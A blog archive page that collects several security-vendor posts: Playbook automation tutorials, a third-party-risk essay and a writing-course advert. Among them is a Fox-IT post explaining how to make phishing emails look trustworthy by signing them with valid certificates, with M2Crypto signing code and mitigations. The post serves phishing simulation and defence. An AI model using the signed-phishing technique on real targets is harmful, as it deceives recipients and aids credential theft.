Category Archives: Blog

Playbook Fridays: How to Create a Playbook for the Non-Programmer

Playbooks for the Non-Programmer, using (what else?) Star Wars

ThreatConnect developed the Playbooks capability to help analysts automate time-consuming and repetitive tasks so they can focus on what is most important and, in many cases, to ensure that the analysis process can occur consistently and in real time, without human intervention.

We've written lots of Playbook Friday posts. None, though, has explained how to create a Playbook in the first place. So, for those of you who might need the first step - or a refresher - read on...

Overview of APIs

An API (Application Programming Interface) is an interface provided by a software service that allows developers to perform tasks and retrieve information programmatically. In simpler terms, an API is used by other software, while a UI (User Interface) is used by humans. By using an API, you can automate things that users do manually, saving time.

Retrieving data from an API

We're going to use the example of retrieving data from the publicly available Star Wars API (of course!). This API provides various data relating to the first seven Star Wars movies.

Building our Playbook

  1. Choose the data you want to retrieve

After reviewing the API documentation, we decide that we want to retrieve a list of film titles.

Star Wars API Documentation - Films. To retrieve a list of the films and their data, we make a call to the API's films endpoint. When we do this, we receive a JSON-formatted response. This is a human-readable format that organizes information in two ways:

  • lists (or arrays);
  • dictionaries (or key-value pairs).

For more information on the JSON format and how it is used to structure data, see: REST API Tutorial: Introduction to JSON
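As a quick illustration, here is how those two structures nest. This is a minimal Python sketch with made-up film data, not the API's full response:

```python
import json

# A JSON dictionary (key-value pairs) whose "results" key holds a list (array).
# The film data here is made up for illustration.
raw = '{"count": 2, "results": [{"title": "A New Hope"}, {"title": "The Empire Strikes Back"}]}'

data = json.loads(raw)                  # parse the JSON text into Python objects
print(type(data).__name__)              # dict -> a JSON dictionary
print(type(data["results"]).__name__)   # list -> a JSON list/array
print(data["results"][0]["title"])      # A New Hope
```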

When we request the films from the API, we get a list of different films, each described in the following format:


The format above includes a title key and a release_date key, which we'll use to display each film in our Playbook as a Campaign in the ThreatConnect UI.

  2. Querying the API in our Playbook

To query the API, we use the following steps in our Playbook:

  • HTTPLink Trigger - This is used as the item that starts the Playbook
  • HTTP Client - We will provide this with the URL of the StarWars API above

We will also loop the result back from the HTTP Client to the Trigger so that we can see the results.

When we execute this Playbook, the raw JSON returned from the API looks like this:

This JSON response is difficult to read in its raw form. Remember, it wasn't designed for a human to read or interact with, so we have a few different ways to make it usable. The first option is a Chrome extension, which adds a button in your browser to make the response readable:

Another option is to paste it into a JSON formatter website:

  • Copy the JSON text
  • Paste the JSON into the main editor window

  • Click the formatter icon at the top left
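If you'd rather not paste the response into a website, the same cleanup can be done locally. A short Python sketch using only the standard library:

```python
import json

# A fragment of the API response, flattened onto one line for illustration.
raw = '{"count": 7, "results": [{"title": "A New Hope", "episode_id": 4}]}'

# json.dumps with indent re-serializes the parsed data in a readable layout,
# doing locally what the formatter extension and websites do in the browser.
pretty = json.dumps(json.loads(raw), indent=2)
print(pretty)
```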

3. Find the data you want to retrieve

We want to retrieve the title of each movie. From the API response, we can see that:

  • there is a dictionary with a key called results;
  • the value of results is an array of films;
  • each film is its own dictionary or object; and
  • the name of the movie is stored under the title key in that dictionary.

For example:


"count": 7,

"next": null,

"previous": null,

"results": [


"title": "A New Hope",

"episode_id": 4,

We want to retrieve the title and release date for each film, using JMESPath to filter the response down to just the fields we want.

To do this, we'll need to use JMESPath or JSONPath. Either works, but JMESPath is preferred and is the one we'll use for this demonstration. Navigate in your browser to the JMESPath website and paste in your JSON content.

Since we know from the formatted output that the data we want is in the "results" dictionary, we put that into JMESPath's website:

So far so good, but not exactly what we're going for yet. We need to filter down further to just the titles and release dates. Because "results" holds a list and we want every item in it rather than a single one, we have to add an empty pair of brackets [ ] to our query before we can filter further, like below:

We can now target "title" by specifying our query as "results[].title", and the release date with "results[].release_date".
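For readers who prefer to see the equivalent logic in code, the two queries can be mirrored in plain Python (the release dates below are illustrative values):

```python
import json

response = json.loads('''
{
  "count": 2,
  "results": [
    {"title": "A New Hope", "release_date": "1977-05-25"},
    {"title": "The Empire Strikes Back", "release_date": "1980-05-17"}
  ]
}
''')

# Equivalent of the JMESPath query "results[].title":
titles = [film["title"] for film in response["results"]]

# Equivalent of "results[].release_date":
release_dates = [film["release_date"] for film in response["results"]]

print(titles)         # ['A New Hope', 'The Empire Strikes Back']
print(release_dates)  # ['1977-05-25', '1980-05-17']
```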

4. Capture the data in Playbooks

Great! We have the titles and release date! Now let's modify our Playbook to capture this information. To do this, you'll need to add the Playbook app "JMESPath" into your Playbook:

Then, in the "JSON Data" area, pass in the HTTP Content:

Then, in the "JMES Path StringArray Expression" area, input the query and assign it a "variable" or key name, such as "titles" and "release_dates":

5. Saving the data
Now let's save our extracted data as Campaigns!

This part is pretty simple. Add the step "Create ThreatConnect Campaign". It has two required fields, marked with "*": "Campaign Name" and "First Seen".

Use "titles" for the former and "release_dates" for the latter.

6. Viewing the data
After a successful execution of the Playbook, you should now see the Campaigns (aka "titles") and their "creation date" inside of the Browse page in the source defined in the "Create ThreatConnect Campaign" step.

Congratulations! You're on your way to creating all the Playbooks!

The post Playbook Fridays: How to Create a Playbook for the Non-Programmer appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

5 Reasons to Mark a False Positive in ThreatConnect

By taking an intelligence-driven approach, we can start to connect the dots in a more interesting fashion

ThreatConnect allows you to curate almost every facet of your intelligence -- including indicator reputation. One of the best ways you can help keep a tidy shop is to flag an indicator as a False Positive (FP) when you encounter it. Notionally we're all familiar with what this should do: it tells your colleagues (both human and software) that this indicator isn't actually a threat and can be skipped in your day-to-day analysis.

By taking an intelligence-driven approach however, we can start to connect the dots in a more interesting fashion. Beyond signaling your coworkers, flagging an indicator as a False Positive has some interesting and far-reaching implications. Read on to see what impact you can have across the world with a single button click!


1. Decrease in ThreatAssess Score

An indicator's ThreatAssess Score is greatly affected by the number of False Positives reported.

Our ThreatAssess algorithm leverages input from users to fine-tune an indicator's reputation. The most immediate impact of clicking the False Positive button is on the indicator's score. On a 1000-point scale, an indicator's score will drop as it continues to accrue FP votes. This includes votes within your organization and across organizations, and accounts for the age of votes over time! The ThreatAssess score affects how quickly your team can understand and triage indicators, and can also impact integrations downstream.
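To make the idea concrete, here is a toy model of FP-weighted scoring. This is purely illustrative and is NOT ThreatConnect's actual ThreatAssess algorithm; the penalty size and half-life are invented numbers:

```python
import math

def toy_threat_score(base_score, fp_vote_ages, half_life_days=180):
    """Illustrative toy model only (not the real ThreatAssess algorithm).

    Each False Positive vote subtracts a penalty from a 1000-point-scale
    score, with older votes weighted less via exponential decay.
    fp_vote_ages: list of vote ages in days.
    """
    penalty_per_vote = 50  # invented value
    penalty = sum(
        penalty_per_vote * math.exp(-math.log(2) * age / half_life_days)
        for age in fp_vote_ages
    )
    return max(0, base_score - penalty)

print(toy_threat_score(800, [0]))    # a fresh vote counts fully: 750.0
print(toy_threat_score(800, [180]))  # a 180-day-old vote counts half: ~775
```

The point is only the shape of the behavior: more votes push the score down, and older votes count for less.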


2. False Positive Filters

Quickly identify which indicators have had FP votes directly from the Browse screen.

As FP votes accumulate on an indicator, there are controls built across the platform that allow you to sort data accordingly. Since FP's are a valuable form of context around your intelligence, we want to make sure you can access them in meaningful ways that help inform your decisions:

  • Use filters on the Browse screen to remove indicators with FP votes and clean up your workflow
  • Create Dashboard cards to identify which feeds and data sources are resulting in high concentrations of FP's in your network
  • Leverage our API and integration-based filters to fine-tune your tolerance for suspected FP indicators across your ecosystem


3. Global CAL counts

Quickly determine how many FPs have been submitted and how many times an indicator has been observed by global CAL users.

If you're participating in ThreatConnect's CAL™ (Collective Analytics Layer), all of the FP votes on an indicator will be sent to be anonymized and aggregated. These totals are what drive the rows you see in the Analytics card on an indicator's Details Page. This provides valuable insight into how all analysts view an indicator. In addition to informing (and being informed) by your team, you can benefit from the analysis of the entire ThreatConnect user base.


4. Feed Evaluation

ThreatConnect's Intelligence Report Card helps you better understand and prioritize feeds.

CAL doesn't just count all of the FP votes, it puts them to work. One of CAL's key uses for FP votes is feed evaluation, in the form of Report Cards. If you're ever wondering which open source feeds to enable in your system, Report Cards are there to help! CAL computes key metrics of how each feed is performing across the ThreatConnect ecosystem, and your FP votes can help inform the Reliability Score of a feed. As I discussed in our blog post about Report Cards, Reliability Score is a measure of how many, and how egregious, the FP's are within a given feed. We're all familiar with the garbage in/garbage out problem; this is one of our best ways of identifying the big offenders!


5. CAL Analytics

Drill further down into additional CAL Insights

There are multiple other analytics that CAL runs based on FP votes, each of which could fill its own blog post. CAL incorporates FP votes at a fundamental level into things like indicator reputation, classification, indicator status, and more! There's more to consider than just the number of FP votes, so CAL uses its massive dataset and computing power to weigh additional factors such as FP vote timeliness, consensus, and other things we find to be significant.

The more data CAL accumulates, the smarter these analytics get!


The post 5 Reasons to Mark a False Positive in ThreatConnect appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

In the 21st Century’s ‘Great Game,’ Third Party Risk Explodes

Third party risk explodes

The recent Shamoon attack on the Italian firm Saipem is a cautionary tale about the danger posed by metastasizing third party risks as the Internet becomes the stage for geopolitical power struggles.

By Paul F. Roberts

The Italian firm Saipem, which services the oil industry, was on the receiving end of a malware outbreak over the weekend of December 8, 2018, according to a company statement (PDF). The attack affected about 300 to 400 servers and 100 personal computers on the company’s corporate network, according to a report by Reuters.

While that might not be unusual, the malware used in the attack was. Analysis of the malicious file determined that it was a variant of the Shamoon malware, a destructive "wiper" program that has been linked to earlier attacks on oil firms in the Middle East, including Saudi Aramco, a Saudi Arabian firm, and RasGas, headquartered in Qatar. In the original Shamoon outbreak in 2012, the malware infected and erased data on some 30,000 systems on the Saudi Aramco network, forcing a months-long recovery process at the firm. Shamoon popped up again in late 2016 in another round of attacks against oil firms in the Middle East; that attack came just ahead of a meeting of OPEC at which oil production cuts were to be introduced.

A friend of my enemy is…

Those earlier attacks and the Shamoon malware have been labeled "advanced persistent threat" (or APT) attacks and linked to hacking groups with ties to the Iranian government, a regional rival of Saudi Arabia. So why attack an Italian firm best known for deep sea oil drilling? There's a three-word answer: Third. Party. Risk. It turns out that one of Saipem's biggest customers is – you guessed it – Saudi Aramco, a high-profile target of the Shamoon APT group. In all likelihood, Saipem was not a direct target so much as a vital link in Saudi Aramco's supply chain that was also vulnerable to attack.

Welcome to the 21st Century’s equivalent of the “Great Game” – that (in)famous contest for geopolitical advantage between the British and Russian empires in the 19th century. Only these days, the theater of conflict and confrontation is not in the foothills of Afghanistan or Uzbekistan, but online: as the world’s great and emerging powers carry out operations with determination and – mostly – impunity all over the globe.

The Shamoon attack on Saipem shows how the growing clout and ambition of nation state actors online makes it more important than ever (and harder than ever) for organizations to understand the web of first-, second-, and third-party cyber risks they face.

Consider, for a moment, the long list of Fortune 500 firms affected by the NotPetya wiper malware, which appeared in June 2017. Firms like Merck Pharmaceuticals, Federal Express, the global shipping firm A.P. Moller-Maersk, and candy maker Mondelez were crippled by the virulent malware, which erased the hard drives of systems it infected. Affected firms realized losses in the tens and hundreds of millions of dollars. FedEx alone estimated its losses from NotPetya at $400 million.

What was their exposure? In many cases it was an obscure Ukrainian financial software package known as MeDoc that provided the initial point of entry for NotPetya. In other cases, firms had yet to apply a patch for a critical vulnerability in Microsoft Windows that was exploited using an NSA-developed tool dubbed "EternalBlue." While none of the firms themselves were direct targets of the group behind the malware, they were all collateral damage in a long-running physical and cyber conflict between Russia and Ukraine.

Refiguring third party risk

But if the risk posed by third parties is growing more complex, is there anything companies can do to manage it? The short answer is, “Yes.”

Know your stuff

To start with, organizations of all sizes need a better grasp on the hardware, software, and services at use in their organization. Knowing what software and services are operating within your environment is the first and most important step to limiting your exposure to third party risk.

As the NotPetya incident indicates, even innocuous applications can become avenues for devastating attack. That's especially true of the cloud-based platforms that have blossomed in recent years, forming a kind of "shadow IT" deployment within your organization. Services such as Slack and Dropbox are powerful collaboration and sharing tools, but they can also be weaponized by an enterprising external actor or a malicious insider. So know that they're there, make sure they're deployed securely, and have a plan to manage any risks they present.

Know your data

Knowing what sensitive data your company owns is just as important as knowing the IT assets in your environment. Stolen personally identifying information has monetary value on the cyber underground. Even absent financial data like credit card numbers, stolen personal and proprietary customer data can be used as part of identity theft schemes or a larger nation-state operation. (For example: Marriott's stolen guest data is believed to have been taken by Chinese government hackers and could be used to map the movement of persons of interest.) Your sensitive intellectual property could be stolen and used to give competitors a leg up on you in the marketplace. Do a data audit of both on-premises and (increasingly) cloud environments to make sure you've accounted for any sensitive and (especially) regulated data, then make sure you have adequate safeguards protecting that data, including encryption for data at rest and in transit, strict user access controls, adequate logging, and so on.

Put a human in the loop

Speaking of "managing the risks" of third party software and services: one recurrent theme in recent vendor compromise stories is the decision by downstream software users to enable automatic update or configuration features. In the case of NotPetya, sophisticated attackers were able to compromise the vendor behind MeDoc and disguise the malware as a signed software update. Companies that had configured their software to automatically download and install that update were infected; organizations that hadn't enabled automatic updates weren't. Put a human in the loop for software updates and other changes so you don't get caught off guard.

Accept what you don’t know

Ultimately, you won’t always have direct visibility into all your nth-party risks. That’s why it is important to seek the counsel of those who can provide you insights into your most pressing risks and also notify you to unseen threats and dangers. Third party risk scorecards might help you grasp your security posture at a single moment in time, but that doesn’t address the bigger issue – alerting of dynamic and evolving risks or threats. That’s only something a continuous monitoring solution can offer.

If the events of the last two years have taught us anything, it’s that third party risk is real and growing, and no organization is perfect at combatting it. However, the process becomes more manageable by partnering with organizations that have the tools and services that can control third party risk in a comprehensive way: by continuously monitoring third party hardware, software, and service providers for the presence of malicious threats and other Indicators of Compromise (IOCs).

Third party threat monitoring isn’t a panacea. It won’t solve your digital risk problem alone. But it is something that every company has to make a priority – or be prepared to pay the price!

The post In the 21st Century’s ‘Great Game,’ Third Party Risk Explodes appeared first on LookingGlass Cyber Solutions Inc..

A Short Cybersecurity Writing Course Just for You

My new writing course for cybersecurity professionals teaches how to write better reports, emails, and other content we regularly create. It captures my experience of writing in the field for over two decades and incorporates insights from other community members. It’s a course I wish I could’ve attended when I needed to improve my own security writing skills.

I titled the course The Secrets to Successful Cybersecurity Writing: Hack the Reader. Why “hack”? Because strong writers know how to find an opening to their readers’ hearts and minds. This course explains how you can break down your readers’ defenses, and capture their attention to deliver your message—even if they’re too busy or indifferent to others’ writing.

Here are several examples of such “hacking” techniques from course sections that focus on the structure and look of successful security writing:

  • Headings: Use them to sneak in the gist of your message, so you can persuade your readers even if they don't read the rest of your text.
  • Lists: Rely on them to capture your readers’ attention when they skim your message for key ideas.
  • Figure Captions: Include them to influence the conclusion your readers reach even if they only glance at the graphic. 

This is an unusual opportunity to improve your writing skills without sitting through tedious lectures or writing irrelevant essays. Instead, you’ll make your writing remarkable by learning how to avoid common pitfalls.

For instance, this slide opens the discussion about expressing ideas clearly, concisely, and correctly:

This course is grounded in the idea that you can become a better writer by learning how to spot common problems in others’ writing. This is why the many examples are filled with delightful errors that are as much fun to find as they are to correct.

One of the practical takeaways from the course is a set of checklists you can use to eliminate issues related to your structure, look, words, tone, and information. For example:

The course will help you stand out from other cybersecurity professionals with similar technical skills. It will help you get your executives, clients, and colleagues to notice your contribution, accept your advice, and appreciate your input. You’ll benefit whether you are:

  • A manager or an individual team member
  • A consultant or an internally-focused employee
  • A defender or an attacker
  • An earthling or an alien

You have a limited opportunity to attend a beta version of the course. You will not only get an early adopter discount and bragging rights, but also shape the course for future participants. I’ll teach the 1st beta in Orlando in April 2019—registration is now open. I’ll present the 2nd beta in New York City in June 2019. Starting around September 2019 you’ll be able to take the course almost exclusively online via the SANS OnDemand platform.

If you want me to notify you when registration for the 2nd beta opens or when the OnDemand version of the course launches, just drop me a note.

Your trust, our signature

Written and researched by Mark Bregman and Rindert Kramer

Sending signed phishing emails

Every organisation, whatever its size, will encounter phishing emails sooner or later. While the number of phishing attacks is increasing every day, the way in which phishing is used within a cyber-attack has not changed: an attacker comes up with a scenario which looks credible enough to persuade the target to perform a certain action like opening an attachment or clicking on a link in the email. To avoid such attacks the IT or security team will tell users to check for certain things to avoid falling for these phishing emails. One of the recommendations is to check if the email is digitally signed with a valid certificate. However, in this blog, we present an attack that abuses this recommendation to regain the recipient’s trust in the sender.

Traditional phishing

Countless organizations have fallen victim to traditional phishing attacks where the attacker tries to obtain credentials or to infect a computer within the target network. Phishing is a safe way to obtain such footholds for an attacker. The attacker can just send the emails, sit back and wait for the targets to start clicking.

At Fox-IT we receive lots of requests to run simulated phishing attacks; so our team sends out hundreds of thousands of carefully crafted emails every year to clients to simulate phishing campaigns. Whether it’s a blanket campaign against the entire staff or a spear phishing one against targeted individuals, the big issue with phishing stays the same; we need to persuade one person to follow our instructions. We are looking for the weakest link. Sometimes that is easy, sometimes not so much. But an attacker has all the time in the world. If there is no success today, then maybe tomorrow, or the day after…
To create security awareness among employees, IT or the security team will tell their users to take a close look at a wide variety of things upon receiving emails. Some say you have to check for spelling mistakes, others say you have to be careful when you receive an email that tries to force you to do something (“Change your password immediately, or you will lose your files”), or when something is promised (“Please fill in this survey and enter the raffle to win a new iPhone”).

SPF records

Some will tell their users to check the domain that sent the email. But others might argue that anyone can send an email from an arbitrary domain; what’s known as ‘email spoofing’.

Wikipedia defines this as:

Email spoofing is the creation of email messages with a forged sender address. Because the core email protocols do not have any mechanism for authentication, it is common for spam and phishing emails to use such spoofing to mislead the recipient about the origin of the message.

— Wikipedia

This means that an email originating from the domain " " may not have been sent by an employee of Fox-IT. This can be mitigated by implementing Sender Policy Framework (SPF) records. In an SPF record you specify which email servers are allowed to send emails on behalf of your domain. If an email originating from the domain " " was not sent by an email server specified in the SPF record, the message can be flagged as spam. SPF records tell you that an email was sent by an authorized email server; they do not, however, establish the authenticity of the sender. If a company has configured its SMTP server as an open relay, users can send mail on another user's behalf and still pass the SPF check on the receiver's end. Other measures, such as DKIM and DMARC, can also be used to identify legitimate mail servers and reduce phishing attacks, but these are beyond the scope of this blog post.
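For illustration, a hypothetical SPF record for the domain example.com, published as a DNS TXT record, might look like this (the IP address and include host are made up):

```text
example.com.  IN  TXT  "v=spf1 ip4: include:_spf.example.com -all"
```

Here `ip4:` and the servers listed behind `include:_spf.example.com` are authorized to send mail for example.com, and `-all` tells receiving servers to fail anything else.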

What is a digital signature?

To tackle the problem of email spoofing some organizations sign their emails with a digital signature. This can be added to an email to give the recipient the ability to validate the sender as well as the integrity of the email message.
For now we’ll focus on the aspect of validating the sender rather than the message integrity aspect. When the email client receives a signed email, it will check the attached certificate to see who the subject of the certificate is (i.e.: “ “). The client will check if this matches the originating email-address. To verify the authenticity of the digital signature, the email client will also check if the certificate is issued (signed) by a reputable Certificate Authority (CA). If the certificate is signed by a trusted Certificate Authority, the receiving email client will tell the recipient that the email is signed using a valid certificate. Most email clients will in this case show a green checkmark or a red rosette, like the one in the image below.


By default there is a set of trusted Certificate Authorities in the Windows certificate store. With digital certificates, everything is based on trusting those third parties, the Certificate Authorities. So we trust that the Certificate Authorities in our Windows certificate store give out certificates only after verifying that the certificate subject (i.e.: “ “) is who they say they are. If we receive a signed email with a certificate which is verified by one of the Certificate Authorities we trust, our systems will tell us that the origin of the email is trusted and validated.
Obviously the opposite is also true. If you receive a signed email and the attached certificate is not signed by a Certificate Authority which is in the Windows certificate store, then the signature will be considered invalid. It is possible to attach a self-signed certificate to an email; in which case the email will be signed, but the receiving email client won’t be able to validate the authenticity of the received certificate and therefore will show a warning message to the recipient.


Common misconception regarding email signing

Some IT teams are pushing email signing as the Holy Grail to avoid being caught by a phishing email, because it verifies the sender. And if the sender is verified, we have nothing to worry about.

Unfortunately, the green checkmark or the red rosette which accompanies a validated email signature seems to stimulate the same behavior as we’ve seen with the green padlock accompanying HTTPS websites. Users see the green padlock in their browser and think that the website is absolutely safe. Similarly, they see the green checkmark or the red rosette and make the assumption that everything is safe: it’s a signed email with a valid certificate, the sender is verified, which means everything must be OK and that the email can’t be a phishing attack.

This may be true: if Alice at sends you a signed email with a valid certificate, the sender really is Alice from Fox-IT, provided that the private key of the certificate is not compromised. But if the sender's address uses the domain '' (notice the '.cm' instead of '.com') and the email is signed with a valid certificate, that person can still be anyone. As long as they control the domain '', they will be able to send signed emails from it. Because many users are told that the green checkmark or the red rosette protects against phishing, they may be caught off guard when they receive an email containing a valid certificate.

Sending signed phishing emails

At Fox-IT we’re always trying to innovate, meaning in this case that we’re looking for ways to make the phishing emails in our simulations more appealing to our client’s employees. Adding a valid certificate makes them look genuine and creates a sense of trust. So when running phishing simulations we use virtual private servers to do the job. For each simulation we setup a fresh server with the required configuration in order to deliver the best possible phishing email. To send out the emails, we’ve developed a Python script into which we can feed a template, some variables and a target list. Recently we’ve updated the script to include the ability to sign our phishing emails. This results in very convincing phishing emails. For example, in Microsoft Office Outlook one of our phishing emails would look like this:


This is not limited to Office Outlook; it works in other mail clients as well, such as Lotus Notes. Although Lotus Notes doesn't have a red rosette to show the user that an email is digitally signed, there are some indicators present when reading a signed email. As you can see below, the digital signature still adds to the legitimate look of the phishing emails:


Going the extra mile

The user has now received a phishing mail that was signed with a legitimate certificate. To make it look even more genuine, we can mention the certificate in the phishing mail. Since the Dutch government has a webpage1 with information about the use of electronic signatures in email, we can write a paragraph that looks something like the one in the image below.


Sign the email

The following (Python) code snippet shows the main signing functionality:

# Import the necessary classes from the M2Crypto library
from M2Crypto import BIO, Rand, SMIME

def makebuf(text):
    # Wrap the message string in an M2Crypto memory buffer.
    return BIO.MemoryBuffer(text)

# Make a MemoryBuffer of the message.
buf = makebuf(msg_str)

# Seed the PRNG.
Rand.load_file('randpool.dat', -1)

# Instantiate an SMIME object; set it up; sign the buffer.
s = SMIME.SMIME()
s.load_key('key.pem', 'cert.pem')
p7 = s.sign(buf, SMIME.PKCS7_DETACHED)

# Recreate buf, because signing consumes it.
buf = makebuf(msg_str)

# Output p7 in mail-friendly format.
out = BIO.MemoryBuffer()
out.write('From: %s\n' % sender)
out.write('To: %s\n' % target)
out.write('Subject: %s\n' % subject)

s.write(out, p7, buf)
msg =

# Save the PRNG's state.
Rand.save_file('randpool.dat')
This code originates from the Python M2Crypto documentation2

For the above code to work, the following files must be in the same directory as the Python script:
* The public certificate saved as cert.pem
* The private key saved as key.pem

There are many Certificate Authorities that allow you to obtain a certificate online. Some even allow you to request a certificate for your email address for free. A quick Google query for "free email certificate" should give you enough results to start requesting your own certificate. If you have access to an inbox, you're good to go.
To get an idea of how the above code snippet can be included in a standalone script, we'd like to refer to Fox-IT's GitHub page, where we've uploaded an example script which takes the most basic email parameters ('from', 'to', 'subject' and 'body'). Don't forget to place the required certificate and corresponding key file in the same directory as the Python script if you start playing around with the example script. Link to project on GitHub:


There are some mitigations that can make this type of attack harder for an attacker to perform. We'd like to give you some tips to help protect your organisation.

Prevent domain squatting

The first mitigation is to register domains that look like your own domain. An attacker that sends a phishing mail from a domain name similar to your own can more easily trick users into executing malware or giving away their credentials. This type of attack is called domain squatting, which can result in examples like instead of . There are generators that can help you with that, such as:

Restrict Enhanced Key Usages

Another mitigation has a more technical approach. For that we need to look into how certificates are used. Let’s say we have an internal Public Key Infrastructure (PKI) with the following components:
* Root CA
* Subordinate CA

The root CA is an important server for maintaining the integrity and secrecy of an organisation's certificates. All non-public certificates stem from this server. For that reason, most organisations choose to completely isolate their root CA and use another server, the subordinate CA, to sign certificate requests: the subordinate CA signs certificates on behalf of the root CA.
In Windows, the certificate of the root CA is stored in the Trusted Root Certification Authorities store, while the certificate of the subordinate CA is stored in the Intermediate Certification Authorities store.

Certificates can be used in many scenarios, for example:
* If you want to encrypt files, you can use Encrypted File System (EFS) in Windows. EFS uses a certificate to protect your data from prying eyes.
* If you have a web server, you can use a certificate to establish a secure connection with a client so that all data is transferred securely.
* Stating the obvious: if you want to send email in a secure way, you can also use a certificate to achieve that

Not every certificate can sign code, encrypt files or send email securely. Certificates have a property, the Enhanced Key Usage (EKU), that states the intended purpose of a certificate. The intended purpose can be one of the actions mentioned above, or a wildcard. A certificate with only an EKU for code signing cannot be used to send email in a secure manner.

By disabling the “Secure Email” EKU on all certification authorities except our own root and subordinate CA, a phishing mail signed with a valid certificate from a third-party CA will still trigger a warning stating that the certificate is invalid.
To do that, we must first discover all certificates that support the Secure Email EKU. This can be done with the following PowerShell one-liner:

# Select all certificates where the EnhancedKeyUsage is empty (Intended Purpose -eq All)
# or where EnhancedKeyUsage contains Secure Email
Get-ChildItem -Path 'Cert:\' -Recurse | Where-Object {$_.GetType().Name -eq 'X509Certificate2' -and ($_.EnhancedKeyUsageList.Count -eq 0 -or $_.EnhancedKeyUsageList.FriendlyName -contains 'Secure Email')} | Select-Object PSParentPath, Subject

We now know which certificates support the Secure Email EKU. In order to disable the Secure Email EKU we have to do some manual labour. It is recommended to apply the following in a base image, group policy or certificate template.

  1. Run mmc with administrative privileges
  2. Go to File, Add or Remove Snap-ins, select Certificates
  3. Select My user account, followed by OK. Please note that this mitigation requires that certificates in all certificate stores must be edited.
  4. Open the properties of a certificate and click the Details tab

    1. Check whether the intended purpose states Secure Email or All

If the intended purpose at step 4.1 stated All,
1. Click Key Usage, followed by Edit Properties…
2. Click Enable only the following purposes and uncheck the Secure Email checkbox

If the intended purpose at step 4.1 stated Secure Email,
1. Click Enhanced Key Usage (property)
2. Click Edit Properties…
3. Uncheck the Secure Email checkbox

Please keep the following in mind when implementing these mitigations:
* When a legitimate mail has been signed with a certificate issued by a CA from which the Secure Email EKU has been removed, the certificate of the email will not be trusted by Windows
* Changing the EKU may have an impact on the working of your systems
* These settings can be reverted with every update in Windows
* New or renewed certificates can have the Secure Email EKU as well

This means that in order to only allow your own PKI server to have the Secure Email EKU enabled you must periodically check for certificates that have this EKU configured.

Human factor

With techniques like the one described in this blog post, it becomes more and more obvious that users will never be able to withstand all social engineering attacks. In the best case scenario, users will detect and report an attack; in the worst case scenario, your users will become victims. It is important to perform awareness exercises and educate users, but we should accept that a percentage of the user base could always become a victim. This means that we (organizations) need to start thinking about new and more user-friendly strategies for combating these types of attacks.

To summarize this blog post:
* An email coming from a domain does not prove the integrity of the sender
* An email that is signed with a trusted and legitimate certificate does not mean that the email can be trusted
* If the domain of the sender address is correct and the email has been signed with a valid certificate from a trusted CA, only then can the email be trusted.


1: (Dutch)
2: “M2Crypto S/MIME”

Playbook Fridays: Github Activity Monitor

This Playbook is designed to automate the monitoring and alerting of GitHub activity for a given user

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Many malicious actors, from unsophisticated defacers to sophisticated actors, use GitHub to develop and/or serve malicious content. This is largely because GitHub offers version control and GitHub Pages for automatically deploying content.

With so much diverse, malicious activity on GitHub, it is important to be able to track the changes on a malicious code repository. This Playbook is designed to automate the monitoring and alerting of GitHub activity for a given user. In this way, you can get alerts whenever a GitHub user performs a public action.

This Playbook is based on the Page Monitor.pbx Playbook described here: . It is designed to be run once a week and uses GitHub's public API to check if there is any new activity. If there is new content, it sends an alert (in this case via Slack).
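Stripped down, the weekly check amounts to fetching the user's public events and comparing them against what was seen last run. A rough sketch in Python — the endpoint is GitHub's public events API, while the `new_events` helper and its stored-ID handling are our stand-ins for the Playbook's datastore logic:

```python
import json
import urllib.request

EVENTS_URL = 'https://api.github.com/users/{user}/events/public'

def fetch_events(user):
    """Fetch a user's recent public events from the GitHub API."""
    with urllib.request.urlopen(EVENTS_URL.format(user=user)) as resp:
        return json.load(resp)

def new_events(events, last_seen_id):
    """Return the events newer than the last event ID we alerted on.

    GitHub returns events newest-first, so everything before the
    previously seen ID is new activity worth alerting on.
    """
    fresh = []
    for event in events:
        if event['id'] == last_seen_id:
            break
        fresh.append(event)
    return fresh

# Offline example with canned data standing in for an API response:
events = [{'id': '3', 'type': 'PushEvent'},
          {'id': '2', 'type': 'CreateEvent'},
          {'id': '1', 'type': 'WatchEvent'}]
print([e['type'] for e in new_events(events, '2')])  # ['PushEvent']
```

In the Playbook, the alert step would then format these events into a Slack message and store the newest event ID for the next run.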

Installing the Playbook

To install the Playbook, download the Github Activity Monitor.pbx Playbook and install it in ThreatConnect from the Playbooks page. Once it is installed, start by editing the "Set Variables" app (the Playbook app right after the trigger). You will need to provide the "slackChannel" variable to which messages will be sent and the "githubUserName" variable you would like to monitor. There are a few other apps which need credentials and other information. The best way to find which apps still need to be updated is to try to turn the Playbook on, which will give you a list of apps that still need to be modified. Among the apps that need to be edited are the Slack apps and the datastore apps.

But what if you don't use Slack? Easy: the Slack apps can be replaced with an app to send an email, create a task in ThreatConnect, or create a Jira issue (among other options). If you have any questions or run into any problems with anything mentioned in this blog, please raise an issue on GitHub! If you would like to have your app or playbook featured in a Playbook Friday blog post, submit it to our Playbook repository (there are instructions here:







The post Playbook Fridays: Github Activity Monitor appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: WhatCMS API Playbook

Detect a website's content management system (CMS)

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Determining the CMS (Content Management System) being used by a particular website is an important part of incident response and threat hunting. Incident responders are concerned with what CMS is being used because this gives clues into why a compromised site has been compromised. Certain CMSs are vulnerable in specific ways and identifying the CMS used on a site is a good place to start when investigating a compromised site. Knowing the CMS is also helpful when threat hunting as the directory structure of a site differs depending on the CMS. If an analyst is hunting for phishing or malware kits that have been installed on a site, knowing where to look decreases the time it may take to hunt for kits.

This Playbook makes it easy to find a website's CMS using the WhatCMS API, saving time and effort. This playbook is triggered by a User Action trigger which shows up for URL, Host, and Address indicators. If one wants to determine the CMS in use by a website, just click the "Detect CMS" user action button. If the WhatCMS API returns successful results, a tag and an attribute with the name of the CMS will be applied to the indicator. The tooltip that appears once the process is complete also includes a link to refresh the indicator's details page so that the user is able to view the new enrichment.
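At its core, the enrichment step is a single API call plus some JSON parsing. The sketch below illustrates that step; note that the endpoint path and the response shape shown here are assumptions for illustration, so check the WhatCMS API documentation for the current contract:

```python
import json
import urllib.parse
import urllib.request

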